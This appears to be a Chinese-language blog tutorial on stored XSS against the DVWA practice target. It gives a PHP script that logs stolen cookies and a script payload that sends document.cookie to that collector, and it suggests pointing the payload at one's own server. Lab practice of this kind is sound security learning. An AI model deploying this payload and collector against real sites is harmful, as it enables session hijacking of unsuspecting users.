存储xss实现获取cookie(本地实战)

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

复制代码
<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

相关推荐
w23617346013 天前
存储型XSS漏洞解析
数据库·oracle·xss·存储型xss
予安灵3 天前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
wordbaby5 天前
网页防篡改 和 流量攻击防护 的具体方案
后端·xss
SuperherRo6 天前
Web开发-JS应用&VueJS框架&Vite构建&启动打包&渲染XSS&源码泄露&代码审计
前端·javascript·vue.js·xss·源码泄露·启动打包
风之旅人-d411 天前
XSS复现漏洞简单前八关靶场
前端·安全·xss
myrouya12 天前
XSS通关技巧
前端·xss
l1x1n013 天前
XSS 攻击向量与绕过技巧
前端·xss
qq_4170146013 天前
xss跨站之原理分类及攻击手法
前端·xss
高显13 天前
XSS介绍&通关XSS-Labs靶场
前端·xss
智商不在服务器16 天前
XSS 绕过分析:一次循环与两次循环的区别
前端·xss